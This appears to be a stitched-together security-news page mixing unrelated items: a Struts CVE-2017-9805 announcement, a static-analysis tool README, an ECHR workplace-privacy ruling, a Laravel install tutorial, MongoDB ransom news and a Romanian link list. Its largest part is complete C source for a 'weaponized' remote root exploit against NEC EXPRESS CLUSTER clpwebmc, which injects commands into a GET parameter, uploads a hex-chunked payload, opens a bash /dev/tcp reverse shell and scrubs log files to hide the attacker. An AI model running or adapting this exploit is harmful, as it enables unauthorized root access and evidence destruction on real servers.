Disclosure Timeline: ================================= Vendor Notification: July 23, 2017 Vendor Notification: July 28, 2017 Vendor Acknowledgement: July 31, 2017 Vendor Fixed released version 6.9 : September 4, 2017 September 4, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx Source: http://seclists.org/bugtraq/2017/Sep/4

Python Taint Static analysis of Python web applications based on theoretical foundations (Control flow graphs, fixed point, dataflow analysis) Features: Detect Command injection Detect SQL injection Detect XSS Detect directory traversal Get a control flow graph Get a def-use and/or a use-def chain Search GitHub and analyse hits with PyT Scan intraprocedural or interprocedural A lot of customisation possible Example usage and output: Install: git clone https://github.com/python-security/pyt.git python setup.py install pyt -h Usage from Source: Using it like a user python -m pyt -f example/vulnerable_code/XSS_call.py save -du Running the tests python -m tests Running an individual test file python -m unittest tests.import_test Running an individual test python -m unittest tests.import_test.ImportTest.test_import Contributions: Join our slack group: https://pyt-dev.slack.com/ - ask for invite: mr.thalmann@gmail.com Guidelines Virtual env setup guide: Create a directory to hold the virtual env and project mkdir ~/a_folder cd ~/a_folder Clone the project into the directory git clone https://github.com/python-security/pyt.git Create the virtual environment python3 -m venv ~/a_folder/ Check that you have the right versions python --version sample output Python 3.6.0 pip --version sample output pip 9.0.1 from /Users/kevinhock/a_folder/lib/python3.6/site-packages (python 3.6) Change to project directory cd pyt Install dependencies pip install -r requirements.txt pip list sample output: gitdb (0.6.4) GitPython (2.0.8) graphviz (0.4.10) pip (9.0.1) requests (2.10.0) setuptools (28.8.0) smmap (0.9.0) In the future, just type source ~/a_folder/bin/activate to start developing. Download pyt-master.zip Source: https://github.com/python-security/pyt

La mulţi ani!

Security researchers at lgtm.com have discovered a critical remote code execution vulnerability in Apache Struts — a popular open-source framework for developing web applications in the Java programming language. All versions of Struts since 2008 are affected; all web applications using the framework’s popular REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency. This vulnerability has been addressed in Struts version 2.5.13. lgtm provides free software engineering analytics for open-source projects; at the time this post is published, over 50,000 projects are continuously monitored. Anyone can write their own analyses; ranging from checks for enforcing good coding practices to advanced analyses to find security vulnerabilities. The lgtm security team actively helps the open-source community to uncover critical security vulnerabilities in OSS projects. This particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data. The lgtm security team have a simple working exploit for this vulnerability which will not be published at this stage. At the time of the announcement there is no suggestion that an exploit is publicly available, but it is likely that there will be one soon. The Apache Struts development team have confirmed the severity of this issue and released a patch today: The Struts maintainers have posted an announcement on their website and the vulnerability has been assigned CVE 2017-9805. More information about how this vulnerability was found using lgtm.com is available in a separate blog post. Analyst Fintan Ryan at RedMonk estimates that at least 65% of the Fortune 100 companies are actively using web applications built with the Struts framework. Organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and SHOWTIME are known to have developed applications using the framework. This illustrates how widespread the risk is. When asked for a comment, the Chief Information Security Officer of a Tier 1 bank confirmed that Struts is still used in large numbers of applications and that this finding poses a real threat: Man Yue Mo, one of the lgtm security researchers who discovered this vulnerability, confirms the criticality: He has written a blog post that describes in more detail how he found this particular vulnerability using the flexible and powerful query language at the heart of lgtm. The lgtm queries flag up software problems and security vulnerabilities on a daily basis. The analysis results for a large number of projects is readily available on lgtm.com, including for popular projects like Hadoop, Jetty, Maven, and Storm — all of which have millions of users, and are the building blocks of famous platforms like Twitter, Spotify, Google, and Amazon. Oege de Moor, CEO and founder of Semmle (the company behind lgtm): The technology that powers lgtm is used by many organizations to analyze their software development process and find security vulnerabilities like the one in Struts. These organizations include: Source: https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement

JarToExeJni.exe: https://www.virustotal.com/#/file/31f21ea5237194c243f3d82ba6aec9386ebbbae4adec2c5793ca9f721f3c7bee/detection https://malwr.com/analysis/NDZlMmViYjE1YTkzNGUzM2I1NDJlZDVlYjI2NTBkN2E/ JarToExeProc.exe https://www.virustotal.com/#/file/6d817562b86972822e4f9031736482c433cc100623098037bc42a5a82fdf786e/detection https://malwr.com/analysis/NTYyNTJiMzQ1YTJjNDJmYWI1MjdlNWU1NzQzYzI5MjU/

Finally, European companies must inform employees in advance if their work email accounts are being monitored. The European Court of Human Rights (ECHR) on Tuesday gave a landmark judgement concerning privacy in the workplace by overturning an earlier ruling that gave employers the right to spy on workplace communications. The new ruling came in judging the case of Romanian engineer Bogdan Barbulescu, who was fired ten years ago for sending messages to his fianceé and brother using his workplace Yahoo Messenger account. Earlier Romanian courts had rejected Barbulescu’s complaint that his employer had violated his right to correspondence—including in January last year when it was ruled that it was not "unreasonable for an employer to want to verify that the employees are completing their professional tasks during working hours." But now, the European court ruled by an 11-6 majority that Romanian judges failed to protect Barbulescu’s right to private life and correspondence, as set out in article 8 of the European Convention on Human Rights. Apparently, Barbulescu's employer had infringed his right to privacy by not informing him in advance that the company was monitoring his account and communications. His employer used surveillance software in order to monitor his computer activities. The ruling will now become law in 47 countries that have ratified the European Convention on Human Rights. In a Q & A section on its website, the European Court of Human Rights says the judgement doesn't mean that companies can't now monitor their employee’s communications at workplace and that they can still dismiss employees for private use. However, the ECHR says that the employers must inform their staff in advance if their communications are being monitored, and that the monitoring must be carried out for legitimate purposes and limited. Via thehackernews.com

NEC EXPRESS CLUSTER comes with Cluster Manager, a Java applet for cluster configuration and management. The underlying webserver 'clpwebmc' runs as root and accepts connections on TCP port 29003 which can be initiated without authentication in the default installation. /* * 2017 update: as of 3.3.4 this bug seems to be fixed * - fixed versions: * NEC EXPRESSCLUSTER X 3.3.4-1 for Linux(amd64) * NEC EXPRESSCLUSTER X SingleServerSafe 3.3.4-1 for Linux(amd64) */ /* * *** THIS IS PRIVATE + UNPUBLISHED (0-DAY) SOURCE CODE, DO NOT DISTRIBUTE *** * * NEC EXPRESS CLUSTER clpwebmc Linux remote root exploit by cenobyte 2015 * <vincitamorpatriae@gmail.com> * * - product description: * NEC EXPRESS CLUSTER is a family of integrated high availability and disaster * recovery software solutions that address the fast recovery and continuous * protection needs of business critical applications and data. With increased * servers and complexity of server applications running Windows or Linux, * EXPRESS CLUSTER minimizes planned and unplanned system outages. * * - vulnerability description: * NEC EXPRESS CLUSTER comes with Cluster Manager, a Java applet for cluster * configuration and management. The underlying webserver 'clpwebmc' runs as * root and accepts connections on TCP port 29003 which can be initiated without * authentication in the default installation. * * A function is available to remove temporary work directories by issuing the * following GET request to port 29003, appended with the location of the * directory that is supposed to be deleted: * GET /DeleteWorkDirectory.js?WorkGuid=directoryname * * The working of the DeleteWorkDirectory.js HTTP request roughly translates to * the following C code: * * void * remove_dir_path(char *WorkGuidParameter) * { * char x[128]; * snprintf(x, sizeof(x), "rm -fr /opt/nec/clusterpro/%s", * WorkGuidParameter); * system(x); * } * * No input sanitation is performed and the supplied arguments are passed * straight on to system(). By setting the WorkGuid parameter to '0' and * appending a semicolon followed by arbritrary commands it is possible to * execute those commands as root on the remote machine. * * Example HTTP GET request with command injection: * GET /DeleteWorkDirectory.js?WorkGuid=0;id>/tmp/id.txt * * Which results on the remote host: * $ ls -la /tmp/id.txt * -rw-rw-rw- 1 root root 57 Apr 20 16:37 /tmp/id.txt * $ cat /tmp/id.txt * uid=0(root) gid=0(root) groups=0(root) * * - tested vulnerable versions: * NEC EXPRESSCLUSTER X 3.3.0-1 for Linux(x86_64) on CentOS 6 * NEC EXPRESSCLUSTER X 3.1 for Linux(x86_64) on CentOS 6 * NEC EXPRESSCLUSTER X 2.1.4-1 for Linux(x86_64) on CentOS 6 * NEC ExpressCluster X LAN for Linux 2.0.2-1 i686 on CentOS 5 * NEC ExpressCluster X WAN for Linux 2.0.2-1 i686 on CentOS 5 * * - tested versions not vulnerable: * NEC ExpressCluster SE for Linux 3.1 i386 on RHEL 4 * * - exploit details: * This exploit is fully "weaponized" as they call it nowadays. It starts a * listening port on the attacking host and connects back from the victim host * using bash /dev/tcp redirection. The attacking host cannot be behind NAT or * run a firewall due to the nature of connect-back. * * A payload system is utilised where commands are encoded to hex and split into * chunks. These chunks are then sent one by one to the victim host and appended * to a temporary file using 'echo -ne'. The temporary file gets executed in the * last request. * * For OPSEC purposes the temporary file will destroy itself and * all traces of the exploit and your IP will be deleted from these log files: * /opt/nec/clusterpro/log/webmgr.log.cur * /opt/nec/clusterpro/log/webmgr.err.cur * * - exploit compilation: * gcc -Wall clpwebmc0day-v2.c -o clpwebmc0day-v2 * * - the exploit connect-back listener is confirmed to work on: * CentOS 6 * Fedora 22 * OS X 10.10.5 * */ #include <arpa/inet.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <fcntl.h> #include <netdb.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <time.h> #include <unistd.h> #define HDR "NEC EXPRESS CLUSTER clpwebmc Linux remote root exploit by cenobyte" #define HEAD "HEAD / HTTP/1.1" #define CLPWEBMCPORT 29003 #define DEFAULTPORT 8080 #define GET "GET /DeleteWorkDirectory.js?WorkGuid=0;" /* the vulnerability */ #define INFO "GET /GetConfiguration.js?WebMgrVersion=0" /* nice info leak */ #define AUTH "Authorization: admin:" #define HTTP " HTTP/1.1\n" #define CRLF "\n\n" #define BUFSIZE 1024 #define MAXPROCCMD 194 /* max len of request.c: process_command parameter */ #define CMD "unset HISTFILE; cd /; /bin/uname -a; /usr/bin/id\n" #define CHMOD "chmod 755 " #define OVERWRITE "head -1024 /dev/urandom>" #define UNLINK "rm -f " #define ECHOAUTH "%secho -ne \"%s\">>%s%s%s%s" #define ECHO "%secho -ne \"%s\">>%s%s" #define LOG "/opt/nec/clusterpro/log/webmgr" #define ECPATH "/opt/nec/clusterpro/0" /* use the logged info leak GET request to find out the IP to connect-back */ #define CONNECTBACK "(/bin/bash 0</dev/tcp/" \ "$(grep GetConfiguration %s.log.cur|" \ "grep IP=|tail -1|tr ':' '\\n'|" \ "grep Root=1|cut -d, -f1)" \ "/%d 1>&0 2>&0) &" /* remove all log entries that reveal the vulnerability, exploit and our IP */ #define ANTIFOR "(sleep 5;for x in log err;do " \ "grep -vE 'd=0|n=0|%s|check_pass|system' %s.$x.cur>%s.0;" \ "cat %s.0>%s.$x.cur;" \ "rm -f %s.0;" \ "done) &" /* TMPPATH is the remote directory where the payload will be stored, you could * use /tmp but there's a fair chance that the sysadmin has mounted that with * 'noexec' */ #define TMPPATH "/opt/nec/clusterpro/log" int sock; int listsock; int list_s; int flags; int port = CLPWEBMCPORT; int connectback = DEFAULTPORT; extern char *__progname; char *host; char *md5; int validport(int port, char *p) { if ((port < 1) || (port > 65535)) { printf("error: %d is an invalid %s port\n", port, p); return(1); } return(0); } void usage() { printf("usage: %s -h <host> [-p|-c|-m]\n", __progname); printf("\t-p [port (default: %d)]\n", port); printf("\t-c [connect-back port (default: %d)]\n", connectback); printf("\t-m [admin user md5 hash]\n\n"); exit(1); } char *genrandom() { int len = strlen(TMPPATH) + 8; int n; char *s = "AbCdEfGhIjKlMnOpQrXtUvWxYz"; char *r = malloc(sizeof(char)*(len + 1)); sprintf(&r[0], "%s/", TMPPATH); srand(time(NULL)); for (n = strlen(TMPPATH) + 1; n < len; n++) r[n] = s[rand() % strlen(s)]; r[len] = '\0'; return(r); } int opensock(char *host, unsigned short int port) { int s; struct hostent *target; struct sockaddr_in addr; target = gethostbyname(host); if (target == NULL) { perror("gethostbyname"); exit(1); } s = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto); if (s == -1) { perror("socket"); exit(1); } memcpy(&addr.sin_addr, target->h_addr, target->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(port); if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect"); exit(1); } return(s); } void sendsock(char *buf) { char readbuf[1024]; if (strlen(buf) >= MAXPROCCMD) { printf("sendsock() max len exceeded"); exit(1); } sock = opensock(host, port); if (write(sock, buf, strlen(buf)) < 0) { perror("write"); exit(1); } if (write(sock, CRLF, strlen(CRLF)) < 0) { perror("write"); exit(1); } if (read(sock, readbuf, sizeof(readbuf) - 1) < 0) { perror("read"); exit(1); } if (strstr(readbuf, "HTTP/1.1 200 OK") == NULL) { if (strstr(readbuf, "HTTP/1.1 403 Forbidden") != NULL) printf("[!] md5 hash is invalid %s\n", md5); else printf("[!] unknown error: [%s][%lu]\n", readbuf, strlen(readbuf)); exit(1); } #ifdef VERBOSE printf("[-] sendsock(): HTTP/1.1 200 OK\n"); #endif close(sock); } void writepayload(char *p, char *path) { char buf[MAXPROCCMD]; if (md5 == NULL) snprintf(buf, sizeof(buf), ECHO, GET, p, path, HTTP); else snprintf(buf, sizeof(buf), ECHOAUTH, GET, p, path, HTTP, AUTH, md5); if (strlen(buf) > MAXPROCCMD) { printf("writepayload(): \"%s\" size exceeds MAXPROCCMD\n", buf); exit(1); } sendsock(buf); } void execpayload(char *path) { char buf[MAXPROCCMD]; printf("[*] executing payload\n"); if (md5 == NULL) { snprintf(buf, sizeof(buf), "%s%s%s%s", GET, CHMOD, path, HTTP); sendsock(buf); snprintf(buf, sizeof(buf), "%s%s%s", GET, path, HTTP); sendsock(buf); } else { snprintf(buf, sizeof(buf), "%s%s%s%s%s%s", GET, CHMOD, path, HTTP, AUTH, md5); sendsock(buf); snprintf(buf, sizeof(buf), "%s%s%s%s%s", GET, path, HTTP, AUTH, md5); sendsock(buf); } } void sendcmd(char *p, char *path) { int i; int n = 1; int c = 0; int maxchunksize; int req; static char buf[MAXPROCCMD]; if (md5 == NULL) { req = strlen(GET) + strlen(HTTP) + strlen(path) + \ strlen(ECHO) + strlen(CRLF); } else { req = strlen(GET) + strlen(HTTP) + strlen(path) + \ strlen(ECHOAUTH) + strlen(CRLF) + strlen(AUTH) + \ strlen(md5); } #ifdef VERBOSE printf("[-] command: \"%s\"\n", p); #endif maxchunksize = (MAXPROCCMD - req) / 4; /* make the payload destroy itself on the filesystem during execution */ printf("[*] adding self destruct to payload: %s\n", path); snprintf(buf, sizeof(buf), "%s%s 2>&1;", OVERWRITE, path); writepayload(buf, path); snprintf(buf, sizeof(buf), "%s%s;", UNLINK, path); writepayload(buf, path); if (strlen(p) > maxchunksize) { printf("[-] command exceeds available space in GET request\n"); printf("[-] have to split in chunks\n"); } printf("[*] uploading command payload to: %s\n", path); printf(" payload size: %lu\n", strlen(p)); printf(" payload chunk space: %d\n", maxchunksize); printf(" number of chunks: %lu\n", strlen(p) / maxchunksize); printf("[*] uploading:\n"); printf(" chunk %d", n); #ifdef VERBOSE printf(" | "); #endif /* turn commands into a hex payload of 'maxchunksize' byte chunks which * are saved to the filesystem. this is to bypass '&' filtering and to * get around the maximum size of GET requests allowed by clpwebmc */ for (i = 0; i < strlen(p); i++) { sprintf(&buf[c * 4],"\\x%02x", p[i]); #ifdef VERBOSE printf(" %c ", p[i]); #endif if (c == (maxchunksize - 1)) { #ifdef VERBOSE printf("\n chunk %d", n); printf(" | %s", buf); #endif printf("\n"); writepayload(buf, path); c = 0; n++; printf(" chunk %d", n); #ifdef VERBOSE printf(" | "); #endif } else { c++; } } #ifdef VERBOSE printf("\n chunk %d", n); printf(" | %s", buf); #endif printf("\n"); writepayload(buf, path); execpayload(path); } void checkserver() { char buf[BUFSIZE]; sock = opensock(host, port); if (write(sock, HEAD, strlen(HEAD)) < 0) { perror("write"); exit(1); } if (write(sock, CRLF, strlen(CRLF)) < 0) { perror("write"); exit(1); } if (read(sock, buf, sizeof(buf) - 1) < 0) { perror("read"); exit(1); } close(sock); /* older clpwebmc versions present themselves as: ClusterProWebmanager * newer versions use: ClusterWebmanager */ if (strstr(buf, "Server: Cluster") == NULL || \ strstr(buf, "Webmanager") == NULL) { printf("error: %s:%d is not running clpwebmc\n", host, port); exit(1); } /* this GET request gets logged */ sock = opensock(host, port); if (write(sock, INFO, strlen(INFO)) < 0) { perror("write"); exit(1); } if (write(sock, CRLF, strlen(CRLF)) < 0) { perror("write"); exit(1); } if (read(sock, buf, sizeof(buf) - 1) < 0) { perror("read"); exit(1); } close(sock); /* OS checker * WebMgrVersion="WebMgr2.1.1_Linux" * WebMgrVersion="WebMgr3.0.0_Win" */ if (strstr(buf, "_Linux\"") == NULL) { printf("\n"); printf("[!] cannot exploit, %s is not running Linux\n", host); printf(" (your IP has been logged by the target system)\n"); exit(1); } printf("[-] %s:%d is Linux running clpwebmc\n", host, port); if ((strstr(buf, "NeedPasswdAuth=0") == NULL) && (md5 == NULL)) { printf("[!] cannot exploit: clpwebmc has a password set\n"); printf(" see usage how to send an admin password\n"); printf(" (your IP has been logged by the target system)\n"); printf("\n"); usage(); exit(1); } } void setuplistener() { struct sockaddr_in addr; printf("[*] setting up connect-back listener on port: %d\n", connectback); if ((list_s = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) { perror("socket"); exit(1); } addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_ANY); addr.sin_port = htons(connectback); if (bind(list_s, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(1); } if (listen(list_s, BUFSIZE) < 0) { perror("listen"); exit(1); } /* set O_NONBLOCK on listening socket */ flags = fcntl(list_s, F_GETFL, 0); if (fcntl(list_s, F_SETFL, flags | O_NONBLOCK) == -1) { perror("fcntl"); exit(1); } } void connectshell() { int p; char buf[BUFSIZE]; struct timeval tm; fd_set rset; printf("[*] connecting to shell\n"); #ifdef __APPLE__ /* remove O_NONBLOCK flag on OS X machines */ flags = fcntl(list_s, F_GETFL, 0); if (fcntl(list_s, F_SETFL, flags |~ O_NONBLOCK) == -1) { perror("fcntl"); exit(1); } #endif if ((listsock = accept(list_s, NULL, NULL)) < 0) { perror("accept"); exit(1); } p = send(listsock, CMD, strlen(CMD), 0); if (p == -1) { perror("send"); exit(1); } printf("[-] connect-back successful\n\n"); tm.tv_sec = 10; tm.tv_usec = 0; while (1) { FD_ZERO(&rset); FD_SET(listsock, &rset); FD_SET(STDIN_FILENO, &rset); select(listsock + 1, &rset, NULL, NULL, &tm); if (FD_ISSET(listsock, &rset)) { p = read(listsock, buf, sizeof(buf) - 1); if (p <= 0) exit(0); buf[p] = 0; printf("%s", buf); } if (FD_ISSET(STDIN_FILENO, &rset)) { p = read(STDIN_FILENO, buf, sizeof(buf) - 1); if (p > 0) { buf[p] = 0; write(listsock, buf, p); } } } } int main(int argc, char *argv[]) { int opt; char cmd[BUFSIZE]; printf("%s\n\n", HDR); if (argc < 3) usage(); while ((opt = getopt(argc, argv, "h:p:c:m:")) != -1) switch (opt) { case 'h': host = optarg; break; case 'p': port = atoi(optarg); if (validport(port, "target") != 0) exit(1); break; case 'c': connectback = atoi(optarg); if (validport(connectback, "connect-back") != 0) exit(1); break; case 'm': md5 = optarg; printf("[-] using admin auth: %s\n", md5); break; default: usage(); } if (host == NULL) usage(); checkserver(); setuplistener(); snprintf(cmd, sizeof(cmd), CONNECTBACK, LOG, connectback); sendcmd(cmd, genrandom()); /* remove all traces of the payload that were logged by webmgr * also remove all remove_tmp_webm system entries as it reveals our vuln */ printf("[-] anti-forensics: %s.log.cur and %s.err.cur\n", LOG, LOG); snprintf(cmd, sizeof(cmd), ANTIFOR, ECPATH, LOG, LOG, LOG, LOG, LOG); sendcmd(cmd, genrandom()); connectshell(); /* never reached */ return(0); } Download clpwebmc0day-v3.c Source

Alegerea corecta a sterilizatoarelor de biberoane Care sunt cele mai bune biberoane pentru bebelusi Obiceiuri bizare care te pot surprinde in strainatate Ce trebuie sa stim despre lentilele de contact Clipele de dinaintea dezastrelor, in poze haioase Ideale in gospodarie: 10 intrebuintari nestiute ale staniolului Alimente care devin toxice in cuptorul cu microunde Opt aplicatii pentru smartphone despre care nu stiai Cum sa te pregatesti inainte de a pleca in vacanta And more... ___________________________________________________________________________________________________________________________________________________ Learn to read Chinese ... with ease! | ShaoLan ___________________________________________________________________________________________________________________________________________________ Fastest Way to Tie a Tie EVER

Laravel is an open source PHP framework that follows the MVC (Model-View-Controller) design pattern. It has been created by Taylor Otwell in 2011 as an attempt to provide an advanced alternative to the CodeIgniter (CI) framework. In 2011, the Laravel project released version 1 and 2, this year version 5.4 has been released with many improvements like Command-Line (CLI) support named 'artisan', built-in support for more database types and improved routing. In this tutorial, I will show you how to install the Laravel Web Framework with Nginx web server, PHP-FPM 7.1 and MariaDB on a CentOS 7 system. I will show you step by step how to install and configure Laravel under the LEMP stack on CentOS 7 server. Prerequisite: CentOS 7 Server. Root Privileges. Step 1 - Install the EPEL Repository EPEL or Extra Package for Enterprise Linux is an additional package repository that provides useful software packages that are not included in the CentOS official repository. It can be installed on RPM based Linux distributions like CentOS and Fedora. In this tutorial, we need the EPEL repository for the Nginx installation as Nginx packages do not exist in the official CentOS repository. Install the EPEL repository with the yum command below. yum -y install epel-release EPEL repository has been installed. Step 2 - Install Nginx In this tutorial, we will run a Laravel under the LEMP Stack. Nginx is the web server part of the LEMP stack and can be installed from EPEL repository. Install Nginx 1.10 from the EPEL repository with yum. yum -y install nginx When the installation is complete, start Nginx and add it to start at boot time. systemctl start nginx systemctl enable nginx Nginx is running on port 80, check it with the netstat command below. netstat -plntu In case you get 'Command not found' as result, then install the net-tools package as shown below. yum -y install net-tools Step 3 - Install and Configure PHP-FPM 7.1 Laravel can be installed on a server with PHP version >= 5.6.4. In this tutorial, we will use the latest version PHP 7.1 that is supported by Laravel. PHP 7.1 does not exist in the CentOS base repository, we need to install it from a third party repository named 'webtatic'. Install the webtatic repository with this rpm command. rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm Now we can install PHP-FPM with all of the extensions needed by Laravel with a single yum command. yum install -y php71w php71w-curl php71w-common php71w-cli php71w-mysql php71w-mbstring php71w-fpm php71w-xml php71w-pdo php71w-zip PHP 7.1 has been installed on our CentOS 7 system. Next, configure PHP by editing the configuration file php.ini with vim. vim /etc/php.ini Uncomment the line below and change the value to 0. cgi.fix_pathinfo=0 Save the file and exit the editor. Now edit the PHP-FPM file www.conf. vim /etc/php-fpm.d/www.conf PHP-FPM will run under the user and group 'nginx', change the value of the two lines below to 'nginx'. user = nginx group = nginx Instead of using the server port, PHP-FPM will run under a socket file. Change the 'listen' value to the path '/run/php-fpm/php-fpm.sock' as shown below. listen = /run/php-fpm/php-fpm.sock The socket file owner will be the 'nginx' user, and the permission mode is 660. Uncomment and change all values like this: listen.owner = nginx listen.group = nginx listen.mode = 0660 For the environment variables, uncomment these lines and set the values as shown below. env[HOSTNAME] = $HOSTNAME env[PATH] = /usr/local/bin:/usr/bin:/bin env[TMP] = /tmp env[TMPDIR] = /tmp env[TEMP] = /tmp Save the file and exit vim, then start PHP-FPM and enable it to run at boot time. systemctl start php-fpm systemctl enable php-fpm PHP-FPM is running under the socket file, check it with the command below. netstat -pl | grep php-fpm.sock The PHP and PHP-FPM 7.1 installation and configuration have been completed. Step 4 - Install MariaDB Server You can use MySQL or PostgreSQL for your Laravel project. I will use the MariaDB database server for this tutorial. It's available in the CentOS repository. Install MariaDB-server with the yum command below. yum -y install mariadb mariadb-server When the installation is complete, start 'mariadb' and enable it to start at boot time. systemctl start mariadb systemctl enable mariadb MariaDB has been started and is running on port 3306, check it with the netstat command. netstat -plntu Next, configure the root password for MariaDB with the 'mylsq_secure_installation' command below. mysql_secure_installation Type in your mariadb root password, remove the anonymous user etc. Set root password? [Y/n] Y Remove anonymous users? [Y/n] Y Disallow root login remotely? [Y/n] Y Remove test database and access to it? [Y/n] Y Reload privilege tables now? [Y/n] Y MariaDB installation and configuration has been completed. Step 5 - Install PHP Composer PHP composer is a package manager for the PHP programming language. It has been created in 2011 and it's inspired by the Node.js 'npm' and Ruby's 'bundler' installer. Install composer with the curl command. curl -sS https://getcomposer.org/installer | sudo php -- --install-dir=/usr/bin --filename=composer When the installation completed, try to use the 'composer' command and you will see the results as below. composer PHP Composer installed on CentOS 7. Step 6 - Configure Nginx Virtual Host for Laravel In this step, we will create the nginx virtual host configuration for the Laravel project. We need to define the web root directory for this Laravel installation, I will use the '/var/www/laravel' directory as web root directory. Create it with the mkdir command below: mkdir -p /var/www/laravel Next, go to the nginx directory and create a new virtual host configuration file laravel.conf in the conf.d directory. cd /etc/nginx vim conf.d/laravel.conf Paste the configuration below into the file: server { listen 80; listen [::]:80 ipv6only=on; # Log files for Debugging access_log /var/log/nginx/laravel-access.log; error_log /var/log/nginx/laravel-error.log; # Webroot Directory for Laravel project root /var/www/laravel/public; index index.php index.html index.htm; # Your Domain Name server_name laravel.hakase-labs.co; location / { try_files $uri $uri/ /index.php?$query_string; } # PHP-FPM Configuration Nginx location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/run/php-fpm/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } } Save the file and exit vim. Test the nginx configuration and make sure there is no error, then restart the nginx service. nginx -t systemctl restart nginx The nginx virtual host configuration for Laravel has been completed. Step 7 - Install Laravel Before installing Laravel, we need to install unzip on the server. yum -y install unzip Now go to the laravel web root directory '/var/www/laravel'. cd /var/www/laravel Laravel provides two ways for the installation of the framework on the server. We can install Laravel with the laravel installer, and we can install it with PHP composer. In this tutorial, I will install Laravel by creating a new project with the composer command. Run the command below to install Laravel. composer create-project laravel/laravel . Wait for the Laravel installation to finish. This may take some time. When the installation is complete, change the owner of the Laravel web root directory to the 'nginx' user, and change the permission of the storage directory to 755 with the commands below. chown -R nginx:root /var/www/laravel chmod 755 /var/www/laravel/storage Laravel installation has been completed. Step 8 - Configure SELinux In this tutorial, Laravel will run under SELinux 'Enforcing' mode. To check the SELinux status, run the command below. sestatus The result is that SELinux is running in 'Enforcing' mode. Next, we need to install the SELinux management tools for CentOS 7. Install 'policycoreutils-python' on the server. yum -y install policycoreutils-python Now we need to change the context of the Laravel directories and then apply the changes with the restorecon command. Run the SELinux management commands as shown below. semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/public(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/storage(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/app(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/bootstrap(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/config(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/database(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/resources(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/routes(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/vendor(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/tests(/.*)?' restorecon -Rv '/var/www/laravel/' SELinux configuration for Laravel is done. Step 9 - Testing Laravel Open your web browser and type in the Laravel URL of your server. We've defined the domain name for the Laravel in the Nginx virtual host file. Mine is laravel.hakase-labs.co. When you visit the domain name, you will see the Laravel home page. Laravel installation with Nginx, PHP-FPM7, and MariaDB on CentOS 7 has been successful. Reference https://laravel.com/docs/5.4/installation Source https://www.howtoforge.com/tutorial/how-to-install-laravel-5x-with-nginx-and-php-fpm-7-on-centos-7/

Security researchers Dylan Katz and Victor Gevers confirmed other 26,000 MongoDB servers were hit in a new wave of ransom attacks. Ransom attacks on MongoDB databases revamped over the weekend after an apparent pause. According to the security researchers Dylan Katz and Victor Gevers, three new groups appeared on the threat landscape and hijacked over 26,000 servers, one of them, in particular, is responsible for hijacking 22,000 machines. Email address Victims Ransom demand Bitcoin address cru3lty@safe-mail.net 22,449 0.2 BTC Bitcoin address wolsec@secmail.pro 3,516 0.05 BTC Bitcoin address mongodb@tfwno.gf 839 0.15 BTC Bitcoin address The security duo believes the attacks are the continuation of the wave of Ransom attack in MongoDB called MongoDB Apocalypse that peaked in January 2017. The attacks were discovered by the Co-founder of the GDI Foundation, Victor Gevers, who warned of poor security for MongoDB installations in the wild. The security expert discovered in January 196 instances of MongoDB that were wiped by Harak1r1 and being held for ransom. Multiple hacking groups scanned the internet for MongoDB installs left open for external connections and replaced their content with a ransom demand. The analysis of the Bitcoin wallet used by Harak1r1 revealed that at least 22 victims appeared to have paid. Many experts in the security community contributed in tracking the attacks, over 45,000 installs were compromised. Hackers targeted also other DBMS, such as MySQL, ElasticSearch, Hadoop, Cassandra, and CouchDB. Back to the present, new groups launched a new wave of attacks against MongoDB databases. Compared with MongoDB Apocalypse, the number of compromised databases in decreased respect the first wave of attacks. Gevers told Bleeping Computer that even if there are fewer attackers, the impact is larger. The experts are now investigating the cause of the success of the attacks. Via http://securityaffairs.co/wordpress/62717/cyber-crime/mongodb-ransom-attacks.html

